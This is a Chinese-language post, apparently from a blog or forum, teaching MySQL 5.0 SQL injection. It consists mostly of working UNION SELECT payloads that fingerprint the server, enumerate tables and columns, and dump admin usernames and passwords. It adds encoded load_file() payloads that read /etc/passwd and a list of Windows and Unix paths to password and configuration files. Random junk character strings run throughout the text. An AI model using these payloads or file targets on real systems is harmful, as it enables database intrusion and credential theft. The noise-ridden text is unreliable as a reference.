mysql5.0注入原理

admin

记得之前园长说不知道MYSQL5.0以上的IFORMATION_SCHEMA表的结构就说自己懂得注入的是很傻逼的事情。于是了解了一番。


8 w' L4 X; P& n# Q9 V9 s/ j! `4 \
6 h) o* z( F+ D0 ]3 M  g- _+ v! XMysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库，其
中记录了Mysql中所有
+ w0 h( q2 B+ L( a5 o$ `4 P存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说
. @% o. m6 _3 T明。
! @; K5 e2 p: J! G0 A& o1.得到所有数据库名：
9 E7 w+ n! w) D/ p) `7 u/ ~|SCHEMATA ->存储数据库名的表
|—字段：SCHEMA_NAME ->数据库名称
! ^! Q# w! f, }- @) S
" ~; Z) c1 V7 j+ Z- T# S: ^3 G|TABLES ->存储表名
|—字段：TABLE_SCHEMA ->表示该表名属于哪个数据库名
4 u2 f5 B( I. x$ c3 k|—字段：TABLE_NAME ->存储表的表名
5 N5 a' |* F6 j2 j% ]
2 z* [2 q/ {' V& W- Z0 ^4 i. ^( t|COLUMNS ->存储的字段名表
|—字段：TABLE_SCHEMA ->该字段所属数据库名
/ L3 z; P: d# i5 s: y|—字段：TABLE_NAME ->存储所属表的名称

|—字段：COLUMN_NAME ->该字段的名称

& G6 A( A8 R$ X" Z5 q- w#########################################################################
##
# @5 y+ i% N- h: [; \
, n& ^' y* X, a4 D6 @0 C0×001 获取系统信息:
% v; I( A+ q* B$ v9 n. U
union select 1,2,3,4,5,concat
9 [( y$ n9 ]" b* r& `+ {1 S(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user
(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
$ l8 V* v0 ~' w' f/ k9 s
7 s) ]8 q8 u7 u" u9 H/*
. O) K1 w* I, h2 A
9 R, i* }3 V9 Z" U' ]* f7 b" C+ L@@global.version_compile_os 获取系统版本

1 G. ~1 B7 h% L* Z7 ?! k8 |@@datadir 数据库路径
database() 当前数据库名称
0x3c62723e 换行HEX值
4 z1 w7 p+ Y/ J1 t
*/

######################################################################

0×002 获取表名
7 s$ ]! u" j' {
union select 1,2,group_concat(table_name),4,5,6,7,8,9 from
information_schema.tables where table_schema=0x67617264656e /*
  b- p( v4 |- H) I& G  d
4 x" H$ U8 C6 m9 H/*
- f+ h  R4 P! V& b0 H0 }
" x  i% [# Z7 w6 C0x67617264656e 为当前数据库名

group_concat(table_name) 使用group_concat函数 一步获得该库所有表名
3 w5 P* V) n7 _/ ]
*/

, M7 B% ]2 k( J; m  E( r/ Y######################################################################

3 s2 q  Y4 O- U* n. t0×003 获取字段
, S. j4 d# o" T- m- D  g3 y" o
- H, J/ c# d% `, ^6 ~" p7 N$ junion select 1,2,group_concat(column_name),4,5,6,7,8,9 from
5 O9 F/ y" y. einformation_schema.columns where table_name=0x61646d696e and


table_schema=0x67617264656e limit 1 /*

4 S/ `2 Z% j( U- L/ w/*
8 H( b8 _  c- F8 D
# U0 x9 ]3 w0 E7 _* J6 R3 fgroup_concat(column_name) 同样是 一口气 获得该表（0x61646d696e）所有字段

0x61646d696e ->选择一个表

0x67617264656e ->数据库名
& k: `' p8 Q% b9 |/ f! c4 x! }
/ @% i5 V; p6 N. N*/

#####################################################################
; g5 z! Z' Z/ l; A  m
" ]( ?& R$ s$ u) Z" A0×004 获取数据
1 O  E" Y3 T7 l  C
1 u, X# A" c$ w% f" V% ?1 a+ vunion select 1,2,3
! i% k! B4 e) X3 r: T* D4 l,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
* g3 n; @- W( B) j  g& c
) q" A' u, r% X5 Gunion select 1,group_concat(id),group_concat(adname),4,5,group_concat
5 F. j7 W% k+ h8 P(adpassword),6,7,8 from admin
( F! }3 g$ j1 n) q9 U7 f
" y, w6 r( a% B/*

0x3c62723e 换行符号HEX编码
# {7 n+ d& }% v) t* T2 [9 \1 f
group_concat 同时获得该字段所有数据

*/
6 V% I3 Z+ H) {$ x& ?$ R+ v

; z3 ~; y+ p7 d, e
2 Q) h/ l+ G" T+ `; `4 U. S
2 J) E4 }  \+ A: U$ v0 t1 q
顺便添加一些mysql注入时非常有用的一些东西
! k5 p( _* `# I0 E# G) E
简单介绍Mysql注入中用到的一些函数的作用，利用它们可以判断当前用户权限（Root为最高，相当于MSSQL中的SA）、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。

1 v1 R% }  B" ]7 `* {1:system_user() 系统用户名
2:user()        用户名
- f6 i  c4 @  N3 A1 ~, T% M0 U3:current_user()  当前用户名
. {* h0 K5 e3 n- W8 S* k* p- Q7 a4:session_user()连接数据库的用户名
' V' Z& ?4 e& O. \. _. X5:database()    数据库名
6:version()     MYSQL数据库版本
! i2 U! A. Y) E/ [: P% M8 q7 t7:load_file()   MYSQL读取本地文件的函数
5 Z- X4 i+ P3 V: \5 w$ E8@datadir     读取数据库路径
9@basedir    MYSQL 安装路径
6 `) m: ~8 o" q10@version_compile_os   操作系统  Windows Server 2003,
' K# X- d: \$ ~  l& D收集的一些路径：
7 f: B1 W' Z$ ?* e- AWINDOWS下:
c:/boot.ini          //查看系统版本
c:/windows/php.ini   //php配置信息
c:/windows/my.ini    //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码
c:/winnt/php.ini
3 u# [) l! l' m/ ^7 D7 gc:/winnt/my.ini
c:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码
0 b1 D1 I+ N/ L8 p) _  o, }c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码
c:\Program Files\Serv-U\ServUDaemon.ini
3 e7 B% d2 w( L& X4 S; `7 Nc:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件
0 v2 ]2 C' g" C/ o  Q  _c:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
c:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
. S( I& x% H7 p2 EC:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
//存储了pcAnywhere的登陆密码
7 K% K) l0 ~1 Pc:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件
. p; d* d6 A+ N: _9 bc:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.
" G2 C1 B1 N2 x- e4 V7 q

* v3 ~: [5 e$ z3 \) Bc:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
/ {; i1 r4 {- F' ^. m5 K% zd:\APACHE\Apache2\conf\httpd.conf
2 [( i/ }( C4 u, l$ ~) Z& vC:\Program Files\mysql\my.ini
7 S( R7 X: z- |3 C8 K' S8 cc:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码
# W: Z" o/ E$ m! O" W- h
1 t3 _) ]+ S- t# K2 ILUNIX/UNIX下:
8 {! P# X, S5 u6 ^9 u9 ^$ u0 S/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
; Z' q) F6 q. f2 j; g/usr/local/apache2/conf/httpd.conf
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/usr/local/app/php5/lib/php.ini //PHP相关设置
/etc/sysconfig/iptables //从中得到防火墙规则策略
/etc/httpd/conf/httpd.conf // apache配置文件
* b% _! Y/ E. _6 e/etc/rsyncd.conf //同步程序配置文件
" R% u4 I1 s+ i6 f% z$ ?, ]( p/etc/my.cnf //mysql的配置文件
/etc/redhat-release //系统版本
! k' ?3 R$ W; E; K/etc/issue
/etc/issue.net
& w% T! W/ @0 ^% W: ]: v/usr/local/app/php5/lib/php.ini //PHP相关设置
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
- }; O6 L/ z( x" Q& t/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
1 y7 n5 {$ e; P/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
% H$ z+ @, J8 N7 x2 V& n/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
9 A: o( t: T( M8 W5 X/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
& v; H8 h1 g& o/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
* M% |% x: }7 Y  P/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/sysconfig/iptables 查看防火墙策略
, u( S: q6 z7 Y" }$ j3 q. Gload_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
replace(load_file(0x2F6574632F706173737764),0x3c,0×20)
replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
% q+ q  U5 N% w8 a$ j/ I上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.

! r+ L2 }* {/ x